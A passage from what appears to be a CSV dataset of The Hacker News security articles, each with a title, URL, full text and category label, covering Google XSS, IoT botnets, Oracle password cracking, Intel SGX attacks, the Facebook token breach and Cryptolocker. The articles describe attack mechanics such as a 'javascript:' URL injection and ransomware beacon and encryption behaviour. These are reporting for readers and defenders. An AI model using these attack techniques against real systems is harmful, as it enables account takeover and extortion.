vulnerabilities, users of all operating system platforms are advised to limit the apps they install on their devices to those that are needed and explicitly trusted. ",Malware Google Apps Flaw Allowed Hacker to Hijack Account and Disable Two-factor Authentication,https://thehackernews.com/2015/01/google-account-hacking.html,"A critical cross-site scripting (XSS) vulnerability in the Google Apps administrator console allowed cyber criminals to force a Google Apps admins to execute just about any request on the https://admin.google.com/ domain. The Google Apps admin console allows administrators to manage their organization's account. Administrators can use the console to add new users, configure permissions, manage security settings and enable Google services for your domain. The feature is primarily used by many businesses, especially those using Gmail as the e-mail service for their domain. The XSS flaw allowed attackers to force the admin to do the following actions: Creating new users with ""super admin"" rights Disabling two-factor authentication (2FA) and other security measures from existing accounts or from multiple domains Modifying domain settings so that all incoming e-mails are redirected to addresses controlled by the attacker Hijack an account/email by resetting the password, disabling 2FA, and also removing login challenges temporarily for 10 minutes This new zero-day vulnerability was discovered and privately reported by application security engineer Brett Buerhaus to Google on September 1 and the company fixed the flaw within 17 days. In exchange for the report, Google paid the researcher $5,000 as a reward under its bug bounty program. According to the researcher, when users access a service that hasn't been configured for their domain, they are presented with a ""ServiceNotAllowed"" page. This page allows users to switch between accounts in order to log in to the service. However, when one of the accounts was selected, a piece of JavaScript code was executed in an attempt to redirect the user's Web browser. JavaScript code could be supplied by the user in the ""continue"" request parameter of the URL, which allowed XSS attacks. ""The continue request parameter is fairly common request variable in the Google login flow,"" Buerhaus explained in a blog post published on Wednesday. ""This is the only page that I could find that did not validate the URL passed into it. This allowed you to craft Cross-Site Scripting attacks by using ""javascript:"" as part of the URL and it would execute when the browser location is redirected."" Patching the vulnerability on the 17th day after reported to the company shows the search engine giant's concern to secure its software and users as well. However, the recent vulnerability troubles visited Microsoft exposed one-after-one three serious zero-day vulnerabilities in Windows 7 and 8.1 operating systems, reported by Google's Project Zero team. Microsoft wasn't able to fix the security flaws in its software even after a three-month-long time period provided to the company. ",Vulnerability New Rapidly-Growing IoT Botnet Threatens to Take Down the Internet,https://thehackernews.com/2017/10/iot-botnet-malware-attack.html,"Just a year after Mirai—biggest IoT-based malware that caused vast Internet outages by launching massive DDoS attacks—completed its first anniversary, security researchers are now warning of a brand new rapidly growing IoT botnet. Dubbed 'IoT_reaper,' first spotted in September by researchers at firm Qihoo 360, the new malware no longer depends on cracking weak passwords; instead, it exploits vulnerabilities in various IoT devices and enslaves them into a botnet network. IoT_reaper malware currently includes exploits for nine previously disclosed vulnerabilities in IoT devices from following manufactures: Dlink (routers) Netgear (routers) Linksys (routers) Goahead (cameras) JAWS (cameras) AVTECH (cameras) Vacron (NVR) Researchers believe IoT_reaper malware has already infected nearly two million devices and growing continuously at an extraordinary rate of 10,000 new devices per day. This is extremely worrying because it took only 100,000 infected devices for Mirai to took down DNS provider Dyn last year using a massive DDoS attack. Besides this, researchers noted that the malware also includes more than 100 DNS open resolvers, enabling it to launch DNS amplification attacks. ""Currently, this botnet is still in its early stages of expansion. But the author is actively modifying the code, which deserves our vigilance."" Qihoo 360 researchers say. Meanwhile, researchers at CheckPoint are also warning of probably same IoT botnet, named ""IoTroop,"" that has already infected hundreds of thousands of organisations. ""It is too early to guess the intentions of the threat actors behind it, but with previous Botnet DDoS attacks essentially taking down the Internet, it is vital that organisations make proper preparations and defence mechanisms are put in place before attack strikes."" researchers said. According to CheckPoint, IoTroop malware also exploits vulnerabilities in Wireless IP Camera devices from GoAhead, D-Link, TP-Link, AVTECH, Linksys, Synology and others. At this time it is not known who created this and why, but the DDoS threat landscape is skyrocketing and could reach tens of terabits-per-second in size. ""Our research suggests we are now experiencing the calm before an even more powerful storm. The next cyber hurricane is about to come."" CheckPoint researchers warned. You need to be more vigilant about the security of your smart devices. In our previous article, we have provided some essential, somewhat practical, solutions to protect your IoT devices. Also Read: How Drones Can Find and Hack Internet-of-Things Devices From the Sky. ",Malware Oracle Database stealth password cracking vulnerability,https://thehackernews.com/2012/09/oracle-database-stealth-password.html,"Oracle suffered with serious vulnerability in the authentication protocol used by some Oracle databases. This Flaw enable a remote attacker to brute-force a token provided by the server prior to authentication and determine a user's password. A researcher - Esteban Martinez Fayo, a researcher with AppSec tomorrow will demonstrate a proof-of-concept attack. Martinez Fayo and his team first reported the bugs to Oracle in May 2010. Oracle fixed it in mid-2011 via the 11.2.0.3 patch set, issuing a new version of the protocol. ""But they never fixed the current version, so the current 11.1 and 11.2 versions are still vulnerable,"" Martinez Fayo says, and Oracle has no plans to fix the flaws for version 11.1. The first step in the authentication process when a client contacts the database server is for the server to send a session key back to the client, along with a salt. The vulnerability enables an attacker to link a specific session key with a specific password hash. There are no overt signs when an outsider has targeted the weakness, and attackers aren't required to have ""man-in-the-middle"" control of a network to exploit it. ""Once the attacker has a Session Key and a Salt (which is also sent by the server along with the session key), the attacker can perform a brute force attack on the session key by trying millions of passwords per second until the correct one is found. This is very similar to a SHA-1 password hash cracking. Rainbow tables can' t be used because there is a Salt used for password hash generation, but advanced hardware can be used, like GPUs combined with advanced techniques like Dictionary hybrid attacks, which can make the cracking process much more efficient."" ""I developed a proof-of-concept tool that shows that it is possible to crack an 8 characters long lower case alphabetic password in approximately 5 hours using standard CPUs."" Because the vulnerability is in a widely deployed product and is easy to exploit, Fayo said he considers it to be quite dangerous. ",Vulnerability "Microsoft, Adobe and Mozilla issue Critical Security Patch Updates",https://thehackernews.com/2015/05/microsoft-adobe-mozilla-update.html,"This week you have quite a long list of updates to follow from Microsoft, Adobe as well as Firefox. Despite announcing plans to kill its monthly patch notification for Windows 10, the tech giant has issued its May 2015 Patch Tuesday, releasing 13 security bulletins that addresses a total of 48 security vulnerabilities in many of their products. Separately, Adobe has also pushed a massive security update to fix a total of 52 vulnerabilities in its Flash Player, Reader, AIR and Acrobat software. Moreover, Mozilla has fixed 13 security flaws in its latest stable release of Firefox web browser, Firefox 38, including five critical flaws. First from the Microsoft's side: MICROSOFT PATCH TUESDAY Three out of 13 security bulletins issued by the company are rated as 'critical', while the rest are 'important' in severity, with none of these vulnerabilities are actively exploited at this time. The affected products include Internet Explorer (IE), current versions of Windows (and its components), Office, SharePoint Server, Silverlight and the .NET Framework as well. The bulletin rated Critical bundles: MS15-943 – A cumulative update for Internet Explorer that patches 22 separate flaws, including 14 memory corruption bugs and the most critical one that include remote code execution vulnerabilities. MS15-944 – It patches two flaws in the OpenType and TrueType font rendering code that could be exploited in .NET Framework, Lync, Office, Windows, and Silverlight. The most critical of which includes remote code execution. MS15-945 – It patches six flaws in Windows Journal program, which comes installed by default in all supported client versions of Windows. All the six flaws could allow remote code execution. The bulletin rated Important bundles: MS15-946 – Fixes a pair of vulnerabilities in Office allowing remote code execution. MS15-947 – Patches one remote code execution vulnerability in SharePoint. MS15-948 – Patches a pair of vulnerabilities in the .NET Framework allowing denial of service (DoS) and elevation of privilege. MS15-949 – Fixes one elevation of privilege bug in Silverlight. MS15-950 – Fixes one elevation of privilege flaw in Windows Service Control Manager. MS15-951 –MS15-951 – Patches six vulnerabilities in Windows Kernel allowing information disclosure and elevation of privilege. MS15-952 – Fixes one security bypass flaw in Windows Kernel. MS15-953 – Patches a pair of security bypass vulnerabilities in VBScript. MS15-954 – Fixes one denial of service (DoS) bug in the Microsoft Management Console. MS15-955 – Patches one vulnerability in Schannel allowing for information disclosure. The company advised users and administrators to test and install the updates as soon as possible. This May Patch Tuesday 2015 could be one of the last patch Tuesdays by Microsoft. ADOBE PATCH UPDATES On Wednesday, Adobe released its recent set of security updates for the Adobe Flash Player, Adobe Reader and Acrobat software, including patches for some critical vulnerabilities. Adobe patches at least 18 security holes in its Flash Player and AIR software. The updates are available for Windows, Mac OS X and Linux versions of the software, addressing ""vulnerabilities that could potentially allow an attacker to take control of the affected system,"" according to the company. The Flash Player update addresses: A number of remote code execution vulnerabilities Four memory corruption vulnerabilities One heap overflow vulnerability One integer overflow bug Three type confusion flaws One use-after-free vulnerability A time-of-check time-of-use (TOCTOU) race condition that bypasses Protected Mode in Internet Explorer Validation bypass issues that could be exploited to write arbitrary data to the file system under user permissions Memory leak vulnerabilities that could be used to bypass ASLR (Address Space Layout Randomization) One security bypass vulnerability that could lead to information leaks Affected Flash Player Versions: Adobe Flash Player version 17.0.0.169 and earlier Adobe Flash Player version 13.0.0.281 and earlier 13.x versions Adobe Flash Player version 11.2.202.457 and earlier 11.x versions AIR Desktop Runtime 17.0.0.144 and earlier versions AIR SDK and SDK & Compiler 17.0.0.144 and earlier versions Adobe Reader and Acrobat update addresses: Critical remote code execution vulnerabilities Five use-after-free vulnerabilities Heap-based buffer overflow vulnerabilities One buffer overflow vulnerability Ten memory corruption vulnerabilities Affected Adobe Reader and Acrobat Versions: Adobe Reader XI (11.0.10) and earlier 11.x versions Reader X (10.1.13) and earlier 10.x versions Acrobat XI (11.0.10) and earlier 11.x versions Acrobat X (10.1.13) and earlier 10.x versions Adobe Acrobat Reader DC has not been affected in this security update. Also, the latest Adobe update also resolves: Various methods to bypass JavaScript API execution restrictions A memory leak issue A null-pointer dereference issue that could lead to a denial-of-service (DoS) attacks An information disclosure bug in the handling of XML external entities that could lead to information disclosure The company recommends its users to accept automatic updates for the Adobe Flash Player desktop runtime for Windows and Mac OS X when prompted or update manually via the Adobe Flash Player Download Center. MOZILLA UPDATES Mozilla addresses five critical flaws, five high-risk bugs and two moderately rated vulnerabilities in its Firefox 38. One of the serious problems it fixes resides in Firefox 38 – An out-of-bounds read and write vulnerability in the JavaScript subset ""asm.js"" during the validation procedure, whose exploitation could lead an attacker to read parts of the memory that may contain users sensitive data. Among the critical vulnerabilities is a buffer overflow in the way the browser parses compressed XML, which have been fixed in the latest Firefox 38 update. The most important update in Firefox is that the new version of the browser includes a feature that enables the use of DRM-enabled (Digital Rights Management-enabled) video content in Firefox. The latest Firefox browser update also includes an integration with the Adobe Content Decryption Module (CDM), allowing users to play DRM-wrapped content in HTML5 video tag. ""A year ago, we announced the start of efforts to implement support for a component in Firefox that would allow content wrapped in Digital Rights Management (DRM) to be played within the HTML5 video tag. This was a hard decision,"" the company states in the blog post. ""As we explained then, we are enabling DRM to provide our users with the features they require in a browser and allow them to continue accessing premium video content. We don't believe DRM is a desirable market solution, but it's currently the only way to watch a sought-after segment of content."" To reimburse, Mozilla has also designed a sandbox that encompasses the CDM, restricting interaction with sensitive parts of the system and the browser. In addition, the Mozilla developer is also offering a version of Firefox 38 that doesn't include the CDM component from the browser. ",Vulnerability Intel CPUs Vulnerable to New 'SGAxe' and 'CrossTalk' Side-Channel Attacks,https://thehackernews.com/2020/06/intel-sgaxe-crosstalk-attacks.html,"Cybersecurity researchers have discovered two distinct attacks that could be exploited against modern Intel processors to leak sensitive information from the CPU's trusted execution environments (TEE). Called SGAxe, the first of the flaws is an evolution of the previously uncovered CacheOut attack (CVE-2020-0549) earlier this year that allows an attacker to retrieve the contents from the CPU's L1 Cache. ""By using the extended attack against the Intel-provided and signed architectural SGX enclaves, we retrieve the secret attestation key used for cryptographically proving the genuinity of enclaves over the network, allowing us to pass fake enclaves as genuine,"" a group of academics from the University of Michigan said. The second line of attack, dubbed CrossTalk by researchers from the VU University Amsterdam, enables attacker-controlled code executing on one CPU core to target SGX enclaves running on a completely different core, and determine the enclave's private keys. A TEE, like Intel's Software Guard Extensions (SGX), refers to a secure enclave, an area within a processor that ensures confidentiality and integrity of code and data. It offers safeguards against the modification of sensitive software and data by malicious actors that may have broken into the target (virtual) machine. SGAxe Attack: Extracting Sensitive Data From SGX Enclaves SGAxe builds on the CacheOut speculative execution attack to steal SGX data. According to the researchers, while Intel took steps to address side-channel attacks against SGX via several microcode updates and new architectures, the mitigations have proven ineffective. That exploit, as a result, results in a transient execution attack that can recover SGX cryptographic keys from a fully updated Intel machine, which is trusted by Intel's attestation server. Attestation is a mechanism offered as part of SGX that lets enclaves prove to third parties that they have been correctly initialized on a genuine Intel processor. The idea is to ensure that the software running inside the CPU hasn't tampered with and to have increased confidence that the software is running inside the enclave. ""In a nutshell, we use CacheOut to recover the sealing keys from within the address space of Intel's production quoting enclave,"" the researchers stated. ""Finally, we use the recovered sealing keys in order to decrypt the long term storage of the quoting enclave, obtaining the machines EPID attestation keys."" By breaking this trust, SGAxe makes it easy for an attacker to create a rogue enclave that passes Intel's attestation mechanism, resulting in loss of security guarantees. ""With the machine's production attestation keys compromised, any secrets provided by [the] server are immediately readable by the client's untrusted host application, while all outputs allegedly produced by enclaves running on the client cannot be trusted for correctness,"" the researchers said. ""This effectively renders SGX-based DRM applications useless, as any provisioned secret can be trivially recovered."" Although Intel issued fixes for CacheOut back in January via a microcode update to OEM vendors and subsequently via BIOS updates to end-users, mitigations for SGAxe will require patching the root cause behind CacheOut (aka L1D Eviction Sampling). ""It is important to note that SGAxe relies on CVE-2020-0549 which has been mitigated in microcode (confirmed by the researchers in their updated CacheOut paper) and distributed out to the ecosystem,"" Intel said in a security advisory. The chipmaker will also perform a Trusted Compute Base (TCB) recovery to invalidate all previously signed attestation keys. ""This process will ensure that your system is in a secure state such that your system is able to use remote attestation again,"" the researchers stated. CrossTalk Attack: Leaking Information Across CPU cores CrossTalk (CVE-2020-0543), the second SGX exploit, is what the VU University calls an MDS (Microarchitectural Data Sampling) attack. It takes advantage of a ""staging"" buffer that's readable across all CPU cores to mount transient execution attacks across the cores and extract the entire ECDSA private key of a secure enclave running on a separate CPU core. ""The staging buffer retains the results of previously executed offcore-instructions across all CPU cores,"" the researchers observed. ""For instance, it contains the random numbers returned by the offcore hardware DRNG, bootguard status hashes, and other sensitive data."" Put differently, CrossTalk works by reading the staging buffer during transient execution in order to leak sensitive data accessed by previously executed victim instructions. The fact that the buffer retains output from RDRAND and RDSEED instructions makes it possible for an unauthorized party to track the random numbers generated, and therefore compromise the cryptographic operations that underpin the SGX enclave, including the aforementioned remote attestation process. With Intel CPUs released from 2015 to 2019, counting Xeon E3 and E CPUs, susceptible to the attacks, VU University researchers said it shared with Intel a proof-of-concept demonstrating the leakage of staging buffer content in September 2018, followed by a PoC implementing cross-core RDRAND/RDSEED leakage in July 2019. ""Mitigations against existing transient execution attacks are largely ineffective,"" the team summarized. ""The majority of current mitigations rely on spatial isolation on boundaries which are no longer applicable due to the cross-core nature of these attacks. New microcode updates which lock the entire memory bus for these instructions can mitigate these attacks—but only if there are no similar problems which have yet to be found."" In response to the findings, Intel addressed the flaw in a microcode update distributed to software vendors yesterday after a prolonged 21-month disclosure period due to the difficulty in implementing a fix. The company has recommended users of affected processors update to the latest version of the firmware provided by system manufacturers to address the issue. ",Vulnerability Facebook Hacked — 10 Important Updates You Need To Know About,https://thehackernews.com/2018/09/facebook-account-hacked.html,"If you also found yourself logged out of Facebook on Friday, you are not alone. Facebook forced more than 90 million users to log out and back into their accounts in response to a massive data breach. On Friday afternoon, the social media giant disclosed that some unknown hackers managed to exploit three vulnerabilities in its website and steal data from 50 million users and that as a precaution, the company reset access tokens for nearly 90 million Facebook users. We covered a story yesterday based upon the information available at that time. Facebook Hack: 10 Important Updates You Need To Know About However, in a conference call [Transcript 1, Transcript 2] with reporters, Facebook vice president of product Guy Rosen shared a few more details of the terrible breach, which is believed to be the most significant security blunder in Facebook's history. Here's below we have briefed the new developments in the Facebook data breach incident that you need to know about: 1.) Facebook Detected Breach After Noticing Unusual Traffic Spike — Earlier this week, Facebook security team noticed an unusual traffic spike on its servers, which when investigated revealed a massive cyber attack, that had been ongoing since 16 September, aimed at stealing data of millions of Facebook users. 2.) Hackers Exploited Total 3 Facebook Vulnerabilities — The hack was accomplished using three distinct bugs of Facebook in combination. The first bug incorrectly offered users a video uploading option within certain posts that enables people to wish their friends 'Happy Birthday,' when accessed on ""View As"" page. The second bug was in the video uploader that incorrectly generated an access token that had permission to log into the Facebook mobile app, which is otherwise not allowed. The third bug was that the generated access token was not for you as the viewer, but for the user that you were looking up, giving attackers an opportunity to steal the keys to access an account of the person they were simulating. 3.) Hackers Stole Secret Access Tokens for 50 Million Accounts — The attackers walked away with secret access tokens for as many as 50 million Facebook users, which could then be used to take over accounts. Access Tokens ""are the equivalent of digital keys that keep people logged in to Facebook, so they don't need to re-enter their password every time they use the app."" 4.) Your Facebook Account Password Has Not Been Compromised, But, Wait! — The good news is that the attack did not reveal your Facebook account passwords, but here's the bad news — it's not even required. An application or an attacker can use millions of secret access tokens to programmatically fetch information from each account using an API, without actually having your password or two-factor authentication code. 5.) Hackers Downloaded Users' Private Information Using Facebook API — Although it is not clear how many accounts and what personal information was accessed by hackers before Facebook detected the incident, the year-old vulnerabilities had left all your personal information, private messages, photos and videos wide open for hackers. ""Since we've only just started our investigation, we have yet to determine whether these accounts were misused or any information accessed,"" the company said. 6.) Your ""Logged in as Facebook"" Accounts at 3rd-Party Apps/Websites Are At Risk — Since secret tokens enabled attackers to access accounts as the account holder themselves, it could have allowed them to access other third-party apps that were using Facebook login — a feature that lets you sign up for, and log in to, other online services using your Facebook credentials. 7.) Facebook Reset Access Tokens for 90 Million Accounts — In response to the massive breach, Facebook reset access tokens for nearly 50 million affected Facebook accounts and an additional 40 million accounts, as a precaution. This means that nearly 90 Million Facebook users were logged out of their accounts on Friday. 8.) Check Active Sessions on Facebook to Find If Your Account Have Been Hacked — Many Facebook users have noticed unknown IP addresses from foreign locations that apparently had accessed their account unauthorizedly. You can head on to ""Account Settings → Security and Login → Where You're Logged In"" to review the list of devices and their location that have accessed your Facebook account. If you found any suspicious session that you never logged in, you can revoke back the access in just one click. 9.) Breach Isn't Connected to the Hacker Who Pledged to Delete Zuckerberg's Personal Page — Earlier this week, a Taiwanese hacker, Chang Chi-Yuang, claimed that he would demonstrate a critical zero-day vulnerability in Facebook by broadcasting himself hacking Mark Zuckerberg's Facebook page on Sunday. However, it is not clear whether the latest Facebook breach has anything to do with Chang's hack, at least Facebook does not believe so. Besides this, Chang Chi-Yuang Today says he canceled the stream and reported the bug to Facebook. 10.) Facebook Faces Class-Action Lawsuit Over The Massive Hack — Just after the news of the breach went public, two residents, Carla Echavarria from California and another from Virginia, filed a class-action complaint against the social media giant in US District Court for the Northern District of California. Both allege that Facebook failed to protect their and additional potential class members data from going into wrong hands due to its lack of proper security practices. The social media giant has already been facing criticism on handling of user data and its privacy policies in the wake of the Cambridge Analytica scandal, in which personal data of 87 million Facebook users was sold to and misused by a data-mining firm without their consent. Facebook has already reset account logins for tens of millions of users and is also advising affected users who had Instagram or Oculus accounts linked to their Facebook account to de-link and than link those accounts again so that the access tokens can be changed. The vulnerabilities exploited by the hackers are fixed, and Facebook is working with the FBI to investigate the security incident, which has impacted approximately 2.5% of Facebook users of its over 2 billion user base. Since the investigation is still in the early stages, Facebook has yet to determine whether the attackers misused the stolen access tokens for 50 million accounts or if any information was accessed. ",Data_Breaches Iran still on target of 'Mahdi' malware after detection,https://thehackernews.com/2012/09/iran-still-on-target-of-mahdi-malware.html,"In JULY Kaspersky Lab and Seculert revealed the presence of a new cyber-espionage weapon known targeting users in the Middle East. Despite the recent uncovering of the 'Madhi' malware that has infected several hundred computers in the Middle East, researchers say the virus is continuing to spread. The malware, known as 'Mahdi' or 'Madi', was originally discovered by Seculert. In addition to stealing data from infected Windows computers, it is also capable of monitoring email and instant messages, recording audio, capturing keystrokes and taking screenshots of victims' computers. Working together, researchers at Seculert and Kaspersky sinkholed the malware's command and control servers and monitored the campaign. What they found was a targeted attack that impacted more than 800 victims in Iran, Israel and other countries from around the globe. Israeli security company Seculert said it had identified about 150 new victims over the past six weeks as developers of the Mahdi virus had changed the code to evade detection by anti-virus programs. That has brought the total number of infections found so far to nearly 1,000, the bulk of them in Iran. ""These guys continue to work,"" Seculert Chief Technology Officer Aviv Raff said via telephone from the company's headquarters in Israel. ""This tells us that the attackers are still doing a very effective job with this surveillance malware,"" he said. The majority of the victims were in Iran, and many were found to be businesspeople working on Iranian and Israeli critical-infrastructure projects, Israeli financial institutions, Middle East engineering students or various government agencies in the region. All totaled, multiple gigabytes of data are believed to have been uploaded from victims' computers, researchers have said. Seculert and Kaspersky dubbed the campaign Mahdi after a term referring to the prophesied redeemer of Islam because evidence suggests the attackers used a folder with that name as they developed the software to run the project. They also included a text file named mahdi.txt in the malicious software that infected target computers. ",Malware China's New Law Requires Vendors to Report Zero-Day Bugs to Government,https://thehackernews.com/2021/07/chinas-new-law-requires-researchers-to.html,"The Cyberspace Administration of China (CAC) has issued new stricter vulnerability disclosure regulations that mandate software and networking vendors affected with critical flaws to mandatorily disclose them first-hand to the government authorities within two days of filing a report. The ""Regulations on the Management of Network Product Security Vulnerability"" are expected to go into effect starting September 1, 2021, and aim to standardize the discovery, reporting, repair, and release of security vulnerabilities and prevent security risks. ""No organization or individual may take advantage of network product security vulnerabilities to engage in activities that endanger network security, and shall not illegally collect, sell or publish information on network product security vulnerabilities,"" Article 4 of the regulation states. In addition to banning sales of previously unknown security weaknesses, the new rules also forbid vulnerabilities from being disclosed to ""overseas organizations or individuals"" other than the products' manufacturers, while noting that the public disclosures should be simultaneously accompanied by the release of repairs or preventive measures. ""It is not allowed to deliberately exaggerate the harm and risk of network product security vulnerabilities, and shall not use network product security vulnerability information to carry out malicious speculation or fraud, extortion and other illegal and criminal activities,"" Article 9 (3) of the regulation reads. Furthermore, it also prohibits the publication of programs and tools to exploit vulnerabilities and put networks at a security risk. ",Vulnerability Cryptolocker Ransomware makes different Bitcoin wallet for each victim,https://thehackernews.com/2013/10/Cryptolocker-Ransomware-Bitcoin-malware-remove-software.html,"When you're online, you expose your vulnerability to malicious virus that have been growing in virulence and ferocity over the last few years. Among home PC users, you may think that you protected from malicious software by Installing an effective, trusted antivirus solution, but most if the Antivirus solutions still it merely finds and removes any known threats. But what if someday you turn on your system and you will find a pop up window with a warning that says ""Your system is Locked and Important drives are encrypted and there is no way out unless you will not Pay fine"". This is what Ransomware malware does to your system. Ransomware is the most serious emerging threat in the virtual world of computing devices. Ransomware is a kind of malware which is designed to Block access to the computing system or can lock your system until an amount of money is paid through Internet banking. Ransomware is usually installed when you open a malicious attachment in an email message or when you click on a malicious link in an email message, instant message, a social networking site or other websites. A new piece of ransomware is giving Internet users one more reason to think twice before they click a link in an email. You may have read about the Cryptolocker malware in our previous stories on The Hacker News, a new ransomware Trojan that encrypts your files and demands money to return them. Cryptolocker has been infecting PCs around the world and effectively holding the files within for ransom. Cryptolocker first made an appearance last month. Malware Researcher 'Octavian Minea' from Bitdefender explains the detailed inner workings of the Cryptolocker Ransomware, lets have a look: The Cryptolocker ransomware gets installed with the help of Zbot variant (Zbot, is a malware toolkit that allows a cybercriminal to build his own Trojan Horse. Zeus, which is sold on the black market, allows non-programmers to purchase the technology they need to carry out cybercrimes.) and after installation it immediately adds itself to the Startup folder with a random name. Then it tries to establish connection with its command and control server on remote location using the Internet and send a 192 byte encrypted packet: ""version=1&id=1&name={COMPUTER_NAME}&group={GROUP_NAME}&lid={LOCATION_ID}"" Where {GROUP_NAME} seems to be related to the time of compilation of the malware and an example for {LOCATION_ID} is 'en-US'. On successful connection, the server generates a pair of 2048-bit RSA public and private key and the malware receives only the public key and a newly generated Bitcoin address. For each victim, only the Cryptolocker authors have access to the decryption private keys. The received information from the server gets stored in the system registry at: HKEY_CURRENT_USER\Software\Cryptolocker_NUMBER\ Which contain the values PublicKey, Version Info with Bitcoin address and the command and control server address in an encrypted form. Cryptolocker uses a solid encryption scheme as well, which so far appears unbreakable. It begins encrypting documents on any local or network storage drive, which are in any of these formats: *.odt*.ods*.odp*.odm*.odc*.odb*.doc*.docx*.docm*.wps*.xls*.xlsx*.xlsm*.xlsb*.xlk*.ppt*.pptx*.pptm*.mdb*.accdb*.pst*.dwg*.dxf*.dxg*.wpd*.rtf*.wb2*.pdf*.mdf*.dbf*.psd*.pdd*.eps*.ai*.indd*.cdr????????.jpg????????.jpeimg_*.jpg*.dng*.3fr*.arw*.srf*.sr2*.bay*.crw*.cr2*.dcr*.kdc*.erf*.mef*.mrw*.nef*.nrw*.orf*.raf*.raw*.rwl*.rw2*.r3d*.ptx*.pef*.srw*.x3f*.der*.cer*.crt*.pem*.pfx*.p12*.p7b*.p7c An AES key is generated for each file to be encrypted, the file is then AES-encrypted and the AES key is itself encrypted using the public key. The encrypted AES key is then appended to the encrypted file. While the public key is stored on the computer, the private key is stored on the command-and-control server; CryptoLocker demands a payment with either a MoneyPak card or Bitcoin to recover the key and begin decrypting files, and threatens to delete the private key if a payment is not received within 3 days. ""Payment of the ransom can generally be performed in Bitcoins, although some Cryptolocker variants also accept payment methods Ukash, CashU or, only in the US of A, in Money Pack prepaid cards which can only be bought with cash. All these payment methods are practically anonymous."" he said. Due to the extremely large key size it uses, analysts and those affected by the worm have considered CryptoLocker to be extremely difficult to repair. Users who have their files locked up by the ransomware are currently paying $300 to $700 to the criminals who run the virus to gain control of their computer. Once the victim pays the ransom, the transaction ID must be entered and purportedly verifications ensue. If a private key is sent by the server, it is added to the registry and the decryption process begins. So far, there have been no reports of the hackers reinfecting a machine once the ransom has been paid. However, the attackers give you roughly three days to pay them, otherwise your data is gone forever, especially if they do not perform regular and off-site backups. Today's cybercriminals are using more sophisticated attacks, such as ransomware and spear phishing, which yield them more money per attack than ever before. A sample study of 1000 users by Symantec found India to be the ransomware capital of Asia Pacific with 11% victims of virtual extortion. There are several free ways to help protect your computer against ransomware and other malware: Make sure to keep all of the software on your computer up to date. Make sure that automatic updating is turned on to get all the latest security updates. Never open any attachment unless you know who it's from and why they are sending it. Use secure connections for sensitive transactions. Use strong alphanumeric and symbol passwords. Use virtual keyboard for internet banking. Common sense is another good weapon in the fight against viruses. Swati Khandelwal - Working at 'The Hacker News'. Social Media Lover and Gadgets Girl. Speaker, Cyber Security Expert and Technical Writer.(Google+ Profile) ",Malware Android Privilege Escalation Flaws leave Billions of Devices vulnerable to Malware Infection,https://thehackernews.com/2014/03/android-privilege-escalation-flaws.html,"Android - a widely used Smartphone platform offered by Google is once again suspected to affect its users with malicious software that puts their android devices at risk. This time the vulnerabilities occur in the way Android handle the updates to add new flavors to your device. Researchers from Indiana University and Microsoft have discovered [Paper PDF] a new set of Android vulnerabilities that is capable to carry out privilege escalation attacks because of the weakness in its Package Management Service (PMS) that puts more than one billion Android devices at risk. The researchers dubbed the new set of security-critical vulnerabilities as Pileup flaws which is a short for privilege escalation through updating, that waylays inside the Android PMS and intensifies the permissions offered to malicious apps whenever an android update occurs, without informing users. The research was carried out by Indiana University Bloomington researchers, Luyi Xing, Xiaorui Pan, Kan Yuan and XiaoFeng Wang, with the help of Rui Wang of Microsoft. Six different Pileup vulnerabilities have been found by the researchers within the Android PMS, those are present in all Android Open Source Project versions, including more than 3,500 customized versions of Android developed by handset makers and carriers. ""Every few months, an update is released, which causes replacement and addition of tens of thousands of files on a live system. Each of the new apps being installed needs to be carefully configured to set its attributes within its own sandboxes and its privileges in the system, without accidentally damaging existing apps and the user data they keep,"" the researchers wrote. ""This complicates the program logic for installing such mobile updates, making it susceptible to security-critical flaws."" The researchers also found that by exploiting the Pileup vulnerabilities, a hacker can not only control the system permission and signature but also their settings. Moreover an attacker could use the malicious app to access and steal the device data, including, sensitive user information such as activity logs, user credentials, Contacts, Messages etc. ""A distinctive and interesting feature of such an attack is that it is not aimed at a vulnerability in the current system. Instead, it exploits the flaws in the updating mechanism of the ""future"" OS, which the current system will be upgraded to,"" the researchers wrote. ""More specifically, though the app running on a lower version Android, the adversary can strategically claim a set of carefully selected privileges or attributes only available on the higher OS version."" In short, it means that, if an attacker sends the malicious app update and if the permission don't exist in the older version of the android that is added to the new version; the malicious app will silently acquire the permissions and when the device is upgraded to the newer version, the pileup flaws will be automatically exploited. ""A third-party package attribute or property, which bears the name of its system counterpart, can be elevated to a system one during the updating shuffle-up where all apps are installed or reinstalled, and all system configurations are reset,"" the researcher wrote. ""Also, when two apps from old and new systems are merged as described above, security risks can also be brought in when the one on the original system turns out to be malicious."" During the update, first the PMS will install all new and existing system apps and then will proceed to install third party apps from the old OS and during the installation of malicious app packed inside PMS, the device will recognize and silently grants all the permissions that malicious app requests, as it supposes that these permissions are with an existing app and have already been approved by the user. ""With the help of a program analyzer, our research discovered 6 such Pileup flaws within Android Package Manager Service and further confirmed their presence in all AOSP (Android Open Source Project) versions and all 3,522 source code versions customized by Samsung, LG and HTC across the world that we inspected, which strongly indicates their existence in all Android devices in the market."" Moreover detecting the critical flaws, the researchers have developed a new scanner app called SecUP that search for malicious apps already on a device designed to exploit Pileup vulnerabilities. Scanning tool inspects already installed Android application packages (APKs) on the device, in an attempt to identify those that will cause privilege escalations during an update, the paper stated. The SecUP scanning tool consists of an automated vulnerability detector, a program verification tool for Java that discovers the Pileup flaws within the source code of different Android versions and a threat analyzer that automatically scans thousands of OS images. ""The detector verifies the source code of PMS (from different Android versions) to identify any violation of a set of security constraints, in which we expect that the attributes, properties (name, permission, UID, etc.) and data of a third-party app will not affect the installation and configurations of system apps during an update,"" the researchers explained. ""A Pileup flaw is detected once any of those constraints are breached."" All the six vulnerabilities have been reported to Google by the researchers, from which one of it has been fixed by them. ",Malware PayPal Vulnerability Allows Hackers to Steal All Your Money,https://thehackernews.com/2015/08/paypal-money-hacking-tool.html,"A critical security vulnerability has been discovered in the global e-commerce business PayPal that could allow attackers to steal your login credentials, and even your credit card details in unencrypted format. Egypt-based researcher Ebrahim Hegazy discovered a Stored Cross Site Scripting (XSS) vulnerability in the Paypal's Secure Payments domain. As it sounds, the domain is used to conduct secure online payments when purchasing from any online shopping website. It enables buyers to pay with their payment cards or PayPal accounts, eliminating the need to store sensitive payment information. However, it is possible for an attacker to set up a rogue online store or hijacked a legitimate shopping website, to trick users into handing over their personal and financial details. How the Stored XSS Attack Works? Hegazy explains a step by step process in his blog post, which gives a detailed explanation of the attack. Here's what the researcher calls the worst attack scenario: An attacker need to set up a rogue shopping site or hijack any legitimate shopping site Now modify the ""CheckOut"" button with a URL designed to exploit the XSS vulnerability Whenever 